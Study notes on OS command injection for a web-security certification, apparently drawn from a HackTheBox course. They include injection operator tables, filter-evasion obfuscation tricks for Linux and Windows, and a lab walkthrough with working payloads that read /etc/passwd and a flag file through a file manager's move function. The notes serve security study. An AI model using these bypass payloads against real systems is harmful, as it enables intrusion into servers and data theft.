BSCP Study Notes on OS Command Injection
HackTheBox Command Injection
PHP Example of executing command directly on the back-end server:
if (isset($_GET['filename'])) {
system("touch /tmp/" . $_GET['filename'] . ".pdf");
JavaScript on NodeJS example of web application perform a OS Command injection:
app.get("/createfile", function(req, res){
child_process.exec(`touch /tmp/${req.query.filename}.txt`);
Injection Operator | Injection Character | URL-Encoded Character | Executed Command |
Semicolon | ; |
%3b |
Both |
New Line | \n |
%0a |
Both |
Background | & |
%26 |
Both (second output generally shown first) |
Pipe | | |
%7c |
Both (only second output is shown) |
AND | && |
%26%26 |
Both (only if first succeeds) |
OR | || |
%7c%7c |
Second, only if first fails Other Injection Operators |
Sub-Shell | `` |
%60%60 |
Both (Linux-only) |
Sub-Shell | $() |
%24%28%29 |
Both Linux-only - Command Injection Methods |
List of injection characters and matching URL encoded as wordlist of possible separators:
List of commands obfuscated as wordlist to test possible WAF filter bypass:
bash<<<$(base64 -d<<<dW5hbWUgLWE=)
b'a's'h'<<<$('b'a's'e'6'4 -d<<<dW5hbWUgLWE=)
Code | Description |
printenv |
Can be used to view all environment variables |
Spaces | |
%09 |
Using tabs instead of spaces |
${IFS} |
Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $() ) |
{ls,-la} |
Commas will be replaced with spaces |
Other Characters | |
${PATH:0:1} |
Will be replaced with forward slash / |
${LS_COLORS:10:1} |
Will be replaced with ; |
$(tr '!-}' '"-~'<<<[) |
Shift character by one to produce back slash ([ -> \ ) |
$(tr '!-}' '"-~'<<<:) |
Character Shifting by one to give a semicolon (: -> ; ) |
Code | Description |
Character Insertion | |
' or " |
Total must be even |
$@ or \ |
Linux only |
Case Manipulation | |
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") |
Execute command regardless of cases |
$(a="WhOaMi";printf %s "${a,,}") |
Another variation of the technique |
Reversed Commands | |
echo 'whoami' | rev |
Reverse a string |
$(rev<<<'imaohw') |
Execute reversed command |
Encoded Commands | |
echo -n 'cat /etc/passwd | grep 33' | base64 |
Encode a string with base64 |
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) |
Execute b64 encoded string |
Encoded newline
is URL encoded value =%0a
Bypass Blacklisted Spaces: whoami
Using Tabs:
Using $IFS:${IFS}
Using Brace Expansion:{ls,-la}
Linux command injection to list the contents of the
folder on target and Bypass the WAF filter by using:${IFS}${PATH:0:1}home
Code | Description |
Get-ChildItem Env: |
Can be used to view all environment variables - (PowerShell) |
Spaces | |
%09 |
Using tabs instead of spaces |
Will be replaced with a space - (CMD) |
Will be replaced with a space - (PowerShell) |
Other Characters | |
%HOMEPATH:~0,-17% |
Will be replaced with \ - (CMD) |
$env:HOMEPATH[0] |
Will be replaced with \ - (PowerShell) |
Code | Description |
Character Insertion | |
' or " |
Total must be even |
^ |
Windows only (CMD) |
Case Manipulation | |
WhoAmi |
Simply send the character with odd cases |
Reversed Commands | |
"whoami"[-1..-20] -join '' |
Reverse a string |
iex "$('imaohw'[-1..-20] -join '')" |
Execute reversed command |
Encoded Commands | |
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) |
Encode a string with base64 |
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))" |
Execute b64 encoded string |
In windows using the
to not starting character position in string, and minus the length, can produce slash character:echo %HOMEPATH:~6,-11%
Linux bash Automated obfuscation tool - Bashfuscator.
cd /home/kali/Downloads/htb/academy/command/Bashfuscator/bashfuscator/bin/
bashfuscator -h
./bashfuscator -c 'cat /etc/passwd'
The output from below bash obfuscater tool is
eval "$(rev <<<'dwssap/cte/ tac')"
./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
Linux bash Automated obfuscation tool - DOSfuscation.
git clone
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Reference: PayloadsAllTheThings
Use what you learned in Bypassing Other Blacklisted Characters section to find name of the user in the '/home' folder. What user did you find?
Use what you learned in Bypassing Blacklisted Commands section find the content of flag.txt in the home folder of the user you previously found.
Find the output of the following command using one of the techniques you learned in this section:
find /usr/share/ | grep root | grep mysql | tail -n 1
Base64 encoded
echo -n 'find /usr/share/ | grep root | grep mysql | tail -n 1' | base64 -w 0;echo
Command injection payload bypassing WAF:
Skills assessment for command injection present a login page to the web application, running
Tiny File Manager 2.4.6
After logging in as the userguest
with a password ofguest
the landing page list files in a folder and there are functions on each listed files in web folder.
Testing and researching vulnerabilities based on the version of the web application, I moved on to enumerating web parameters.
page present functions on the select file to perform actions on the back-end.
Enumeration to find command injection web parameters on the features: Copy or Move.
When testing the move function the error message in response show:
Malicious request denied
. This indicating possible WAF or filters to prevent command injection separator characters detected by back-end.
To determine what the WAF filters are blocking or white listing, I will run Burp Intruder with cluster bomb attack to iterate though all payload list combinations.
Setting 2 payload positions on the web parameter, first position is the separator to use and the second position is the possible Linux bash commands obfuscated.
- Payload 1 (list of Separator Characters) - Do NOT URL-encode characters.
- Payload 2 (list of Obfuscated Commands for Linux) Do enable URL-encode for the characters on this payload list.
After running the first time intruder cluster bomb attack I see results of attack for payload 1 of
give response message with the Linux command in response indicating partial success. Next attack I then appending%26
in-front of position 1 and rerun the attack with the two payloads positions again, then the attack results indicated Sub-Shell$()
allow execution of command.
Attack result show the command obfuscated asu'n'a'm'e
executed and the noGREP
column set in the intruder attack options did not get the messageMalicious request denied
Successfully Identified command injection in the
Sending the request to Burp Suite Repeater where I see below theuname
command executed, giving the response ofLinux
Modifying the request in repeat with a Payload to list the root
folder and list all hidden files with the command,&$()ls / -al
. The obfuscated payload below:
GET /index.php?to=tmp%26$()l's'${IFS}${PATH:0:1}${IFS}-a'l'&from=2561732172.txt&finish=1&move=1 HTTP/1.1
Bash command to read the flag contents,
&$()cat /flag.txt
Below is the obfuscated command injection payload to bypass blacklisted commands and characters through WAF filters.
GET /index.php?to=tmp%26$()c'a't${IFS}${PATH:0:1}flag.txt&from=2561732172.txt&finish=1&move=1 HTTP/1.1